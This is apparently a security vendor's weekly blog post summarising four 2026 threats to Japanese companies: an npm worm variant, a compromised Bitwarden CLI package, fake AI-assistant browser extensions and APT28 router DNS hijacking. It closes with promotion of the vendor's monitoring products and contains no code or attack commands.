![[Week 2 of May 2026] Top 4 Cyber Threats Targeting Japanese Companies | npm Supply Chain Attacks, Fake AI Extensions & DNS Hijacking PIPELINE](https://static.wixstatic.com/media/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png/v1/fill/w_980,h_670,fp_0.50_0.50,q_35,blur_30,enc_avif,quality_auto/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png)
![[Week 2 of May 2026] Top 4 Cyber Threats Targeting Japanese Companies | npm Supply Chain Attacks, Fake AI Extensions & DNS Hijacking PIPELINE](https://static.wixstatic.com/media/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png/v1/fill/w_980,h_670,fp_0.50_0.50,q_95,enc_avif,quality_auto/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png)
![[April 4th Week, 2026] Top 3 Incidents at Japanese Companies: Simultaneous Multiple Attacks on Unauthorized Access, Ransomware, and Overseas Bases PIPELINE](https://static.wixstatic.com/media/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png/v1/fill/w_980,h_670,fp_0.50_0.50,q_35,blur_30,enc_avif,quality_auto/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png)
![[April 4th Week, 2026] Top 3 Incidents at Japanese Companies: Simultaneous Multiple Attacks on Unauthorized Access, Ransomware, and Overseas Bases PIPELINE](https://static.wixstatic.com/media/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png/v1/fill/w_980,h_670,fp_0.50_0.50,q_95,enc_avif,quality_auto/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png)
![[April 2026] Top 4 Emerging Cyber Threats Targeting Japanese Companies | Axios Supply Chain Attack, Cisco IMC Vulnerability PIPELINE](https://static.wixstatic.com/media/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png/v1/fill/w_980,h_670,fp_0.50_0.50,q_35,blur_30,enc_avif,quality_auto/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png)
![[April 2026] Top 4 Emerging Cyber Threats Targeting Japanese Companies | Axios Supply Chain Attack, Cisco IMC Vulnerability PIPELINE](https://static.wixstatic.com/media/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png/v1/fill/w_980,h_670,fp_0.50_0.50,q_95,enc_avif,quality_auto/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png)
[Week 2 of May 2026] Top 4 Cyber Threats Targeting Japanese Companies | npm Supply Chain Attacks, Fake AI Extensions & DNS Hijacking
- 18 hours ago
- 5 min read
This Week's Security Threat Highlights
The latest cyber threats identified overseas, such as npm supply chain attacks, AI-exploiting malware, and DNS hijacking, are now spreading to Japanese companies. This week, we've highlighted four new threats that could impact Japanese businesses at multiple levels, from development environments to corporate networks. Supply chain attacks and breaches of cloud environments are particularly prominent.
Threat 1: Shai-Hulud | A multi-cloud supply chain attack targeting npm
In May 2026, a new variant of the self-replicating malware "Shai-Hulud" was detected in the npm ecosystem. Several major packages, including intercom-client@7.0.4 (over 360,000 weekly downloads), were compromised, and AWS, GCP, and Azure credentials were stolen. The attackers exploited the GitHub Actions OIDC pipeline to take over the CI/CD infrastructure, gaining a foothold for further supply chain attacks.
Relevance to Japanese Companies: Many npm packages used by Japanese development teams may be affected. Companies that perform cloud-native development are particularly concerned about intrusion into production environments from stolen cloud credentials. Companies that use GitHub Actions or OIDC integration should urgently review permission settings and inventory unnecessary tokens.
Threat 2: Bitwarden CLI compromise | Developer malware targeting GitHub credentials
On April 22, 2026, the official CLI (@bitwarden/cli@2026.4.0) for the password management tool Bitwarden was compromised via npm. A malicious pre-installed hook downloaded the Bun JavaScript runtime and executed 9.7MB of obfuscated credential snitching malware. SSH keys, cloud credentials, GitHub tokens, and AI tool configurations (Claude, MCP server) were stolen. The stolen GitHub tokens are being exploited to inject malicious workflows into repositories.
Relevance to Japanese Companies: A single breach can endanger multiple layers, from developers' personal machines to a company's CI/CD pipeline. Development teams at Japanese SaaS companies and financial institutions are particularly vulnerable, and there are concerns about the vulnerability spreading to internal systems.
Threat 3: AiFrame | Fake AI Assistant Extension Infecting 260,000 People
The "AiFrame" campaign, a malicious extension campaign impersonating AI assistants such as ChatGPT, Claude, Gemini, and Grok, has been downloaded by over 260,000 users from the Chrome Web Store. These extensions use iframe injection to eavesdrop on authentication credentials and intercept user input data. This poses a particularly high risk of confidential information leakage if used by corporate users during work hours.
Relevance to Japanese Companies: The use of AI tools by Japanese corporate users is also rapidly increasing, leading to a rise in the installation rate of fake extensions. In particular, there are concerns about eavesdropping on authentication information and confidential data when sales and planning departments input internal information into AI. Companies that allow employees to freely install Chrome extensions urgently need to review their browser usage policies.
Threat 4: Forest Blizzard | DNS hijacking attack exploiting home routers
APT28 (Forest Blizzard), affiliated with the Russian military intelligence agency GRU, is carrying out widespread DNS hijacking attacks on vulnerable home and small office (SOHO) routers. The attackers are tampering with the routers' DNS settings, redirecting users to fake websites, and eavesdropping on authentication credentials such as Microsoft Office tokens to conduct man-in-the-middle (AiTM) attacks.
Relevance to Japanese Companies: Employees of Japanese companies using home routers in teleworking environments may be targeted. In particular, there is a high risk of theft of access credentials to the corporate network through man-in-the-middle attacks during the DNS resolution phase before VPN connection.
sauce
1. Shai-Hulud Worm Pivots to Multi-Cloud: intercom-client@7.0.4 Hijacked
2. Bitwarden CLI Hijacked on npm: Bun-Staged Credential Stealer Targets Developers, GitHub Actions, and AI Tools
3. "AiFrame" - Fake AI Assistant Extensions Targeting 260,000 Chrome Users via injected iframes
4. SOHO router compromise leads to DNS hijacking and adversary-in-the-middle attacks (Forest Blizzard)
How PIPELINE Co., Ltd. can help you
Threat 1 & 2: Supply chain attacks and compromise of development environments
RiskSensor (External Risk Intelligence & Attack Surface Visualization): Real-time monitoring of vulnerabilities and compromise status in npm packages. Early detection of compromised packages such as Shai-Hulud and Bitwarden CLI, and visualization of their usage within the organization.
ThreatIDR (DNS-level threat blocking/malware/C2 communication blocking): Detects and blocks C2 communications using stolen cloud credentials and malware command and control communications at the DNS level. Prevents lateral deployment from development environments to production environments.
DatalaiQ (Threat Hunting, Log Analysis, Incident Investigation): In-depth analysis of CI/CD pipeline logs to detect traces of compromised package execution and eavesdropping on credentials. Supports rapid investigation and response in the event of an incident.
Threat 3: Credential eavesdropping via fake AI assistant extensions
RiskSensor: Detects malicious Chrome extension distribution sources and command & control servers through dark web monitoring. Visualizes extension usage within your organization and enables risk assessment.
ThreatIDR: Blocks access to C2 servers used by fake extensions at the DNS level. Detects and blocks authentication information eavesdropping communications via iframe injection.
DatalaiQ: Analyzes browser network logs to detect malicious iframe communications and authentication information leaks. Endpoint-side threat hunting identifies infected devices.
Threat 4: Man-in-the-middle attack via router DNS hijacking
RiskSensor: Monitors vulnerabilities and compromise status of routers used in teleworking environments. It detects the activity of state-sponsored attackers like Forest Blizzard using external intelligence.
ThreatIDR: Detects man-in-the-middle attacks via DNS hijacking. It detects and blocks abnormal DNS responses and redirects to fake sites at the DNS level. It prevents attacks during the DNS resolution phase before VPN connection.
DatalaiQ: Analyzes network logs to detect authentication information eavesdropping and malicious traffic after DNS hijacking. It identifies abnormal communication patterns from teleworking terminals, enabling early detection of breaches.
Key points this time
To summarize these four threats, the following three points are crucial:
"Things you trust" become attack vectors.
What matters is "how it looks from the outside," not how it looks from within the company.
Surveillance that assumes intrusion is necessary.
In other words, we are entering an era where the premise is not just "protecting" but also "finding."
At PIPELINE, we support companies in strengthening their security systems by providing external risk visualization and continuous monitoring to address these changes.
✦ Finally
Thank you for reading this far.
We at PIPELINE Corporation are a group of experts specializing in cybersecurity and threat intelligence.
We face threats together with our customers on-site every day.
"Even if we have a specialized team within the company, we lack the resources," "We don't know where to start," and "We want to prepare realistically, assuming we will be attacked."
We receive many inquiries like this. Regardless of the size of the company, the current situation is that weak points in defenses are easily targeted.
Furthermore, trying to handle everything internally inevitably makes it easier for things to be overlooked.
That's why we focus on practical methods that are useful in the field, rather than idealistic theories, and propose a small-scale, easy-to-implement approach. Even "a small step within your capabilities" can make a big difference in safety.
If you have any concerns at all, please feel free to contact us. Let's work together to find the quickest way to strengthen your security.
![[April 2026] Top 4 Emerging Cyber Threats Targeting Japanese Companies | Axios Supply Chain Attack, Cisco IMC Vulnerability PIPELINE](https://static.wixstatic.com/media/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png/v1/fill/w_980,h_513,al_c,q_90,usm_0.66_1.00_0.01,enc_avif,quality_auto/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png)
![[Week 2 of May 2026] Top 4 Cyber Threats Targeting Japanese Companies | npm Supply Chain Attacks, Fake AI Extensions & DNS Hijacking PIPELINE](https://static.wixstatic.com/media/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_35,blur_30,enc_avif,quality_auto/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png)
![[Week 2 of May 2026] Top 4 Cyber Threats Targeting Japanese Companies | npm Supply Chain Attacks, Fake AI Extensions & DNS Hijacking PIPELINE](https://static.wixstatic.com/media/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_95,enc_avif,quality_auto/95ec1f_df7cf37dcaa7470da1331eac6e21b25c~mv2.png)
![[April 4th Week, 2026] Top 3 Incidents at Japanese Companies: Simultaneous Multiple Attacks on Unauthorized Access, Ransomware, and Overseas Bases PIPELINE](https://static.wixstatic.com/media/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_35,blur_30,enc_avif,quality_auto/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png)
![[April 4th Week, 2026] Top 3 Incidents at Japanese Companies: Simultaneous Multiple Attacks on Unauthorized Access, Ransomware, and Overseas Bases PIPELINE](https://static.wixstatic.com/media/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_95,enc_avif,quality_auto/95ec1f_d9fa7aad0cbd48fca7833df843dffbd0~mv2.png)
![[April 2026] Top 4 Emerging Cyber Threats Targeting Japanese Companies | Axios Supply Chain Attack, Cisco IMC Vulnerability PIPELINE](https://static.wixstatic.com/media/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_35,blur_30,enc_avif,quality_auto/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png)
![[April 2026] Top 4 Emerging Cyber Threats Targeting Japanese Companies | Axios Supply Chain Attack, Cisco IMC Vulnerability PIPELINE](https://static.wixstatic.com/media/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_95,enc_avif,quality_auto/95ec1f_444d5f1681284ae29889ade51a5956ce~mv2.png)
![[Third Week of April 2026] Cyberattacks on Japanese Companies: 3 Real Incidents and Countermeasures PIPELINE](https://static.wixstatic.com/media/95ec1f_e7dbeb31d3524c4fbf50a37cf6d208b9~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_35,blur_30,enc_avif,quality_auto/95ec1f_e7dbeb31d3524c4fbf50a37cf6d208b9~mv2.png)
![[Third Week of April 2026] Cyberattacks on Japanese Companies: 3 Real Incidents and Countermeasures PIPELINE](https://static.wixstatic.com/media/95ec1f_e7dbeb31d3524c4fbf50a37cf6d208b9~mv2.png/v1/fill/w_1189,h_670,fp_0.50_0.50,q_95,enc_avif,quality_auto/95ec1f_e7dbeb31d3524c4fbf50a37cf6d208b9~mv2.png)
